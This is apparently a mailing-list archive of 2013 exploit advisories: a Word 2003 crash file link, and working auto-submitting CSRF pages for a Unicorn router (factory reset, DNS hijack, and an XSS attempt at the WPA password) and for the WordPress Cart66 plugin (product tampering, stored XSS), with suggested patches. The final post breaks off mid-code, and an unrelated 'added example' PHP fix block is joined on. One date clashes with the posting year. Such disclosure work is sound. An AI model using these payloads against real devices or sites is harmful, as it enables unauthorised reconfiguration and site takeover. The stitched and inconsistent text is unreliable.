Re: Word 2003 SP2 .doc fork bomb on WinXP SP3

2013-11-10 Thread jsibley1
I am sorry, but can this be edited to include Word 2003 SP3 as well? I forgot 
to mention I tested on both SP2 and SP3 of Word 2003.

Thanks,
James


Word 2003 SP2 .doc fork bomb on WinXP SP3

2013-11-08 Thread jsibley1
# Exploit Title:     Word 2003 SP2 .doc fork bomb on WinXP SP3
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    November 8th 2003
# Vendor Homepage:   http://www.microsoft.com
# Tested on:         Windows XP SP3, Word 2003 SP2 (11.6568.6568)

**
*  Vulnerability *
**
A malformed .doc file with an embedded image causes a fork bomb in Word 2003 
SP2 on Windows XP SP3 by consuming 99% - 100% of the CPU cycles, which can 
only be ended by terminating the process.

**
*Proof of Concept*
**
http://www.noobroot.com/exploits/word2003forkbomb.doc

**
*  Mitigation*
**
The vulnerability does not appear to affect Office 2010+ or any other versions 
of Windows.
Upgrade to Windows 7 or higher and/or upgrade to Office 2010 or higher.


Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

2013-10-31 Thread jsibley1
# Exploit Title:     Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    October 29th 2013
# Vendor Homepage:   http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr
# Tested on:         Unicorn WB-3300NR v1.0
# Firmware Version:  V5.07.18_ko_UIS02

***
*Vulnerability*
***
The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require 
authentication, countless exploits exist.

**
*Proof of Concept*
**

1) Factory Reset

<html><body>
<iframe height="0" width="0" id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" method="post" target="cantseeme">
<input type="hidden" name="CMD" value="SYS_CONF">
<input type="hidden" name="GO" value="system_reboot.asp">
<input type="hidden" name="CCMD" value="0">
</form>
<script>document.csrf_form.submit();</script>
</body></html>


2) Alter the DNS Settings

<html><body>
<iframe height="0" width="0" id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme">
<input type="hidden" name="GO" value="wan_dns.asp">
<input type="hidden" name="rebootTag" value="">
<input type="hidden" name="DSEN" value="1">
<input type="hidden" name="DNSEN" value="on">
<input type="hidden" name="DS1" value="8.8.4.4">
<input type="hidden" name="DS2" value="8.8.8.8">
</form>
<script>document.csrf_form.submit();</script>
</body></html>


3) WPA Password Disclosure (possibility)(not proven)

The following PoC code only demonstrates that with CSRF and XSS, it might be 
possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to 
factory defaults.

<html><body>
<iframe height="0" width="0" id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" method="post" target="cantseeme">
<input type="hidden" name="MACC" value='"; var x = ""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'>
</form>
<script>document.csrf_form.submit();</script>
</body></html>


Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-14 Thread jsibley1
# Exploit Title:     Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:      October 12 2013
# Vendor Homepage:   http://cart66.com
# Software Link:     http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:         Wordpress 3.6.1
# Google-dork:       inurl:/wp-content/plugins/cart66
# CVE (CSRF):        CVE-2013-5977
# CVE (XSS):         CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 
1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products


Proof of Concept


<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name="product[name]" id="product-name" value="absane was here" />
<input type="hidden" name="product[item_number]" id="product-item_number" value="1337" />
<input type="hidden" id="product-price" name="product[price]" value="13.37" />
<input type="hidden" id="product-price_description" name="product[price_description]" value="LuLz" />
<input type="hidden" id="product-is_user_price" name="product[is_user_price]" value="0" />
<input type="hidden" id="product-min_price" name="product[min_price]" value="" />
<input type="hidden" id="product-max_price" name="product[max_price]" value="" />
<input type="hidden" id="product-taxable" name="product[taxable]" value="0" />
<input type="hidden" id="product-shipped" name="product[shipped]" value="1" />
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name="product[min_quantity]" value="" />
<input type="hidden" id="product-max_qty" name="product[max_quantity]" value="" />
</form>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

VULNERABILITY #2
***
*** Code Injection  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add <script>alert(0)</script> or any other code. The 
code is placed directly into the database.

Input is not sanitized and the code can be executed in ways that depend on the 
circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC 
JavaScript code was executed when I attempted to add a product or modify an 
existing product.


][
]..SOLUTIONS.[
][

Update to version 1.5.1.15 or greater. 


Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-11 Thread jsibley1
# Exploit Title:     Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:      October 2 2013
# Vendor Homepage:   http://cart66.com
# Software Link:     http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:         Wordpress 3.6.1
# Google-dork:       inurl:/wp-content/plugins/cart66
# CVE (CSRF):        CVE-2013-5977
# CVE (XSS):         CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 
1.5.1.14.

Vulnerabilities:
1) XSS (Stored)
2) CSRF


VULNERABILITY #1
***
*** Stored XSS  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add <script>alert(0)</script>

The product name XSS vuln is particularly dangerous because an attacker can 
use the CSRF vulnerability to add a product whose name is a malicious script. 
All the admin user needs to do is view the product to be attacked.


//
\\


VULNERABILITY #2

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

If the Wordpress admin were logged in and clicked on a link hosting code 
similar to the one in the PoC, then the admin may unknowingly add a product to 
his site or have an existing product altered. Other possibilities include, but 
are not limited to, injecting code into a field vulnerable to stored XSS (see 
the second vulnerability).


Proof of Concept

Host this code on a remote webserver different from the Wordpress site that 
uses Cart66. As an authenticated Wordpress admin user visit the page and add 
what you will to the fields. A new product is added. In a live attack, the 
fields will be hidden, prefilled, and some javascript code will auto submit 
the fields.


<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name="product[name]" id="product-name" value='<script>alert("pwned")</script>' />
<input type="hidden" name="product[item_number]" id="product-item_number" value="1337" />
<input type="hidden" id="product-price" name="product[price]" value="13.37" />
<input type="hidden" id="product-price_description" name="product[price_description]" value='<script>alert(";)")</script>' />
<input type="hidden" id="product-is_user_price" name="product[is_user_price]" value="0" />
<input type="hidden" id="product-min_price" name="product[min_price]" value="" />
<input type="hidden" id="product-max_price" name="product[max_price]" value="" />
<input type="hidden" id="product-taxable" name="product[taxable]" value="0" />
<input type="hidden" id="product-shipped" name="product[shipped]" value="1" />
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name="product[min_quantity]" value="" />
<input type="hidden" id="product-max_qty" name="product[max_quantity]" value="" />
</form>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>


][
]..SOLUTIONS.[
][

Grab the latest update! Or... 

XSS

In products.php, replace the line:
$product->setData($_POST['product']);

with:
$product->setData(Cart66Common::postVal('product'));

CSRF

In products.php, replace the following:

<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
  <input type="hidden" name="cart66-action" value="save product" />
  <input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
  <div id="widgets-left" style="margin-right: 50px;">
    <div id="available-widgets">

with:

<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
  <input type="hidden" name="cart66_product_nonce" value="<?php echo wp_create_nonce('cart66_product_nonce'); ?>" />
  <input type="hidden" name="cart66-action" value="save product" />
  <input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
  <div id="widgets-left" style="margin-right: 50px;">
    <div id="available-widgets">

And, in Cart66Product.php replace the validate() function with:

  public function validate() {
$errors = array();

if(!wp_verify_nonce($_POST['cart66_product_nonce'], 
'cart66_product_nonce')) {
  $errors['nonce'] = __(An
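The two-part fix sketched above (a nonce on the form, verified on save, plus sanitised product input) written out as one complete handler. This is an added example, not Cart66's code: it uses WordPress core's sanitize_text_field() in place of Cart66Common::postVal(), and goes slightly beyond the post by adding a capability check on save and attribute escaping when the stored name is rendered back into the form. The function names cart66_example_render_form and cart66_example_handle_save are hypothetical.

```php
<?php
// Added example (not Cart66's own code). Assumes it runs inside WordPress, so
// wp_nonce_field, wp_verify_nonce, current_user_can, sanitize_text_field,
// esc_attr, absint and wp_die are available. Function names are hypothetical.

function cart66_example_render_form($product_id, $product_name) {
    // The nonce is bound to the logged-in user's session; a form hosted on an
    // attacker's site cannot know it, so a cross-site POST is rejected on save.
    echo '<form action="admin.php?page=cart66-products" method="post">';
    wp_nonce_field('cart66_product_nonce', 'cart66_product_nonce');
    echo '<input type="hidden" name="cart66-action" value="save product" />';
    echo '<input type="hidden" name="product[id]" value="' . esc_attr(absint($product_id)) . '" />';
    // Output escaping: a stored "<script>" in the name renders as text, not code.
    echo '<input type="text" name="product[name]" value="' . esc_attr($product_name) . '" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}

function cart66_example_handle_save() {
    if (!isset($_POST['cart66-action']) || $_POST['cart66-action'] !== 'save product') {
        return null; // not a product save request
    }
    // Capability check: only users allowed to administer the site may save.
    if (!current_user_can('manage_options')) {
        wp_die(__('Insufficient permissions'));
    }
    // Nonce check: wp_verify_nonce() returns false for a missing, forged or
    // expired nonce, which is exactly what the CSRF PoC above would send.
    $nonce = isset($_POST['cart66_product_nonce']) ? $_POST['cart66_product_nonce'] : '';
    if (!wp_verify_nonce($nonce, 'cart66_product_nonce')) {
        wp_die(__('Security check failed (invalid nonce)'));
    }
    $raw = (isset($_POST['product']) && is_array($_POST['product'])) ? $_POST['product'] : array();
    // Sanitise before the data reaches the database: sanitize_text_field()
    // strips tags, so "<script>alert(0)</script>" is stored as "alert(0)".
    return array(
        'id'                => isset($raw['id']) ? absint($raw['id']) : 0,
        'name'              => sanitize_text_field(isset($raw['name']) ? $raw['name'] : ''),
        'price'             => isset($raw['price']) ? floatval($raw['price']) : 0.0,
        'price_description' => sanitize_text_field(isset($raw['price_description']) ? $raw['price_description'] : ''),
    );
}
```

Sanitising on input and escaping on output are both needed: the first keeps the payload out of the database, the second protects any existing rows that were stored before the fix.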